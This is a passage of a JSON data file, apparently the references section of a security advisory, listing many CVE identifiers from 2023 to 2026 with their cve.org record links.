"url": "https://www.cve.org/CVERecord?id=CVE-2025-68296"
},
{
"name": "CVE-2025-68361",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68361"
},
{
"name": "CVE-2023-53785",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53785"
},
{
"name": "CVE-2025-40328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40328"
},
{
"name": "CVE-2025-37916",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37916"
},
{
"name": "CVE-2025-68332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68332"
},
{
"name": "CVE-2023-54263",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54263"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2025-40283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40283"
},
{
"name": "CVE-2025-40324",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40324"
},
{
"name": "CVE-2023-54181",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54181"
},
{
"name": "CVE-2025-68378",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68378"
},
{
"name": "CVE-2025-38529",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38529"
},
{
"name": "CVE-2025-71141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71141"
},
{
"name": "CVE-2025-38359",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38359"
},
{
"name": "CVE-2023-53795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53795"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2025-40250",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40250"
},
{
"name": "CVE-2025-71101",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71101"
},
{
"name": "CVE-2025-40264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40264"
},
{
"name": "CVE-2025-38728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38728"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2025-40074",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40074"
},
{
"name": "CVE-2025-40321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40321"
},
{
"name": "CVE-2025-68360",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68360"
},
{
"name": "CVE-2025-40116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40116"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2025-68249",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68249"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2025-40158",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40158"
},
{
"name": "CVE-2025-40179",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40179"
},
{
"name": "CVE-2025-68742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68742"
},
{
"name": "CVE-2025-40127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40127"
},
{
"name": "CVE-2025-40282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40282"
},
{
"name": "CVE-2023-53819",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53819"
},
{
"name": "CVE-2025-40168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40168"
},
{
"name": "CVE-2023-54210",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54210"
},
{
"name": "CVE-2025-40053",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40053"
},
{
"name": "CVE-2023-54030",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54030"
},
{
"name": "CVE-2025-40120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40120"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68192"
},
{
"name": "CVE-2023-54092",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54092"
},
{
"name": "CVE-2025-68379",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68379"
},
{
"name": "CVE-2023-53997",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53997"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2025-40098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40098"
},
{
"name": "CVE-2025-40129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40129"
},
{
"name": "CVE-2025-71145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71145"
},
{
"name": "CVE-2025-68171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68171"
},
{
"name": "CVE-2025-39814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39814"
},
{
"name": "CVE-2025-40301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40301"
},
{
"name": "CVE-2025-40040",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40040"
},
{
"name": "CVE-2025-22047",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22047"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2023-54224",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54224"
},
{
"name": "CVE-2023-54235",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54235"
},
{
"name": "CVE-2025-40207",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40207"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2023-54032",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54032"
},
{
"name": "CVE-2025-68327",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68327"
},
{
"name": "CVE-2023-53856",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53856"
},
{
"name": "CVE-2025-40318",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40318"
},
{
"name": "CVE-2025-68241",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68241"
},
{
"name": "CVE-2025-40118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40118"
},
{
"name": "CVE-2023-53782",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53782"
},
{
"name": "CVE-2023-54115",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54115"
},
{
"name": "CVE-2023-54069",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54069"
},
{
"name": "CVE-2025-40157",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40157"
},
{
"name": "CVE-2025-40021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40021"
},
{
"name": "CVE-2023-54104",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54104"
},
{
"name": "CVE-2025-40135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40135"
},
{
"name": "CVE-2023-54027",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54027"
},
{
"name": "CVE-2025-68734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68734"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2025-68799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68799"
},
{
"name": "CVE-2026-22993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22993"
},
{
"name": "CVE-2023-53851",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53851"
},
{
"name": "CVE-2025-68345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68345"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2025-40105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40105"
},
{
"name": "CVE-2023-54183",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54183"
},
{
"name": "CVE-2023-53841",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53841"
},
{
"name": "CVE-2023-54326",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54326"
},
{
"name": "CVE-2023-54267",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54267"
},
{
"name": "CVE-2023-54282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54282"
},
{
"name": "CVE-2025-38423",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38423"
},
{
"name": "CVE-2025-40310",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40310"
},
{
"name": "CVE-2025-40083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40083"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-22985",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22985"
},
{
"name": "CVE-2023-54006",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54006"
},
{
"name": "CVE-2023-53784",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53784"
},
{
"name": "CVE-2025-68802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68802"
},
{
"name": "CVE-2023-54067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54067"
},
{
"name": "CVE-2023-54264",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54264"
},
{
"name": "CVE-2025-40154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40154"
},
{
"name": "CVE-2025-40331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40331"
},
{
"name": "CVE-2025-68811",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68811"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2025-68351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68351"
},
{
"name": "CVE-2023-54304",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54304"
},
{
"name": "CVE-2025-38540",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38540"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2025-40149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40149"
},
{
"name": "CVE-2025-40164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40164"
},
{
"name": "CVE-2023-54125",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54125"
},
{
"name": "CVE-2023-54173",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54173"
},
{
"name": "CVE-2023-53743",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53743"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-53842",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53842"
},
{
"name": "CVE-2025-68208",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68208"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2025-38510",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38510"
},
{
"name": "CVE-2026-23002",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23002"
},
{
"name": "CVE-2023-53762",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53762"
},
{
"name": "CVE-2025-68290",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68290"
},
{
"name": "CVE-2025-40280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40280"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2025-40180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40180"
},
{
"name": "CVE-2025-40293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40293"
},
{
"name": "CVE-2025-68750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68750"
},
{
"name": "CVE-2023-54127",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54127"
},
{
"name": "CVE-2023-53861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53861"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-22996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22996"
},
{
"name": "CVE-2025-68331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68331"
},
{
"name": "CVE-2023-54137",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54137"
},
{
"name": "CVE-2021-0920",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0920"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2023-54319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54319"
},
{
"name": "CVE-2025-68305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68305"
},
{
"name": "CVE-2025-40320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40320"
},
{
"name": "CVE-2025-68753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68753"
},
{
"name": "CVE-2023-54140",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54140"
},
{
"name": "CVE-2025-68775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68775"
},
{
"name": "CVE-2026-22986",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22986"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54285"
},
{
"name": "CVE-2023-54025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54025"
},
{
"name": "CVE-2023-54229",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54229"
},
{
"name": "CVE-2025-40200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40200"
},
{
"name": "CVE-2023-54300",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54300"
},
{
"name": "CVE-2025-39880",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39880"
},
{
"name": "CVE-2023-54042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54042"
},
{
"name": "CVE-2023-53807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53807"
},
{
"name": "CVE-2025-40102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40102"
},
{
"name": "CVE-2023-54302",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54302"
},
{
"name": "CVE-2025-40170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40170"
},
{
"name": "CVE-2025-40160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40160"
},
{
"name": "CVE-2025-40284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40284"
},
{
"name": "CVE-2023-54178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54178"
},
{
"name": "CVE-2023-54051",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54051"
},
{
"name": "CVE-2023-53808",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53808"
},
{
"name": "CVE-2025-71148",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71148"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2024-53070",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53070"
},
{
"name": "CVE-2025-38177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38177"
},
{
"name": "CVE-2023-54008",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54008"
},
{
"name": "CVE-2023-54014",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54014"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2025-40307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40307"
},
{
"name": "CVE-2025-40111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40111"
},
{
"name": "CVE-2025-68346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68346"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2025-40211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40211"
},
{
"name": "CVE-2025-40042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40042"
},
{
"name": "CVE-2023-54258",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54258"
},
{
"name": "CVE-2025-39890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39890"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71099"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2025-39742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39742"
},
{
"name": "CVE-2023-54221",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54221"
},
{
"name": "CVE-2025-38352",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38352"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2025-40248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40248"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68303",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68303"
},
{
"name": "CVE-2025-40259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40259"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2025-38551",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38551"
},
{
"name": "CVE-2023-54293",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54293"
},
{
"name": "CVE-2025-40329",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40329"
},
{
"name": "CVE-2025-68784",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68784"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2023-54060",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54060"
},
{
"name": "CVE-2025-68766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68766"
},
{
"name": "CVE-2023-53778",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53778"
},
{
"name": "CVE-2025-39817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39817"
},
{
"name": "CVE-2023-54145",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54145"
},
{
"name": "CVE-2023-54171",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54171"
},
{
"name": "CVE-2025-68792",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68792"
},
{
"name": "CVE-2023-54240",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54240"
},
{
"name": "CVE-2025-40059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40059"
},
{
"name": "CVE-2025-68168",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68168"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2025-68206",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68206"
},
{
"name": "CVE-2023-54247",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54247"
},
{
"name": "CVE-2025-71100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71100"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2023-54070",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54070"
},
{
"name": "CVE-2023-54204",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54204"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2025-68313",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68313"
},
{
"name": "CVE-2025-38516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38516"
},
{
"name": "CVE-2025-38262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38262"
},
{
"name": "CVE-2023-53676",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53676"
},
{
"name": "CVE-2023-53850",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53850"
},
{
"name": "CVE-2023-54303",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54303"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2025-40123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40123"
},
{
"name": "CVE-2023-53998",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53998"
},
{
"name": "CVE-2025-68301",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68301"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2025-40297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40297"
},
{
"name": "CVE-2025-68217",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68217"
},
{
"name": "CVE-2025-40178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40178"
},
{
"name": "CVE-2025-68289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68289"
},
{
"name": "CVE-2025-40363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40363"
},
{
"name": "CVE-2023-53852",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53852"
},
{
"name": "CVE-2025-71156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71156"
},
{
"name": "CVE-2026-22988",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22988"
},
{
"name": "CVE-2025-68245",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68245"
},
{
"name": "CVE-2025-40317",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40317"
},
{
"name": "CVE-2023-54135",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54135"
},
{
"name": "CVE-2023-53996",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53996"
},
{
"name": "CVE-2025-68233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68233"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2024-26944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26944"
},
{
"name": "CVE-2025-38321",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38321"
},
{
"name": "CVE-2025-40316",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40316"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2023-54314",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54314"
},
{
"name": "CVE-2025-68758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68758"
},
{
"name": "CVE-2025-38539",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38539"
},
{
"name": "CVE-2025-71113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71113"
},
{
"name": "CVE-2023-54292",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54292"
},
{
"name": "CVE-2023-54172",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54172"
},
{
"name": "CVE-2023-54113",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54113"
},
{
"name": "CVE-2025-40141",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40141"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2023-53836",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53836"
},
{
"name": "CVE-2025-40288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40288"
},
{
"name": "CVE-2025-68239",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68239"
},
{
"name": "CVE-2025-40258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40258"
},
{
"name": "CVE-2023-53857",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53857"
},
{
"name": "CVE-2023-53860",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53860"
},
{
"name": "CVE-2025-68185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68185"
},
{
"name": "CVE-2025-40304",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40304"
},
{
"name": "CVE-2025-40110",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40110"
},
{
"name": "CVE-2023-54169",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54169"
},
{
"name": "CVE-2025-40268",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40268"
},
{
"name": "CVE-2025-39980",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39980"
},
{
"name": "CVE-2023-54281",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54281"
},
{
"name": "CVE-2023-54080",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54080"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2023-53794",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53794"
},
{
"name": "CVE-2025-68178",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68178"
},
{
"name": "CVE-2025-40337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40337"
},
{
"name": "CVE-2025-40346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40346"
},
{
"name": "CVE-2025-37845",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37845"
},
{
"name": "CVE-2025-40262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40262"
},
{
"name": "CVE-2025-39813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39813"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2023-54022",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54022"
},
{
"name": "CVE-2025-40261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40261"
},
{
"name": "CVE-2025-40030",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40030"
},
{
"name": "CVE-2023-54296",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54296"
},
{
"name": "CVE-2025-40244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40244"
},
{
"name": "CVE-2025-68735",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68735"
},
{
"name": "CVE-2025-39819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39819"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2025-40323",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40323"
},
{
"name": "CVE-2025-38569",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38569"
},
{
"name": "CVE-2025-68285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68285"
},
{
"name": "CVE-2025-38512",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38512"
},
{
"name": "CVE-2023-54220",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54220"
},
{
"name": "CVE-2023-54209",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54209"
},
{
"name": "CVE-2025-40275",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40275"
},
{
"name": "CVE-2023-54019",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54019"
},
{
"name": "CVE-2025-68211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68211"
},
{
"name": "CVE-2025-39829",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39829"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2023-54189",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54189"
},
{
"name": "CVE-2025-68227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68227"
},
{
"name": "CVE-2025-40339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40339"
},
{
"name": "CVE-2025-40140",
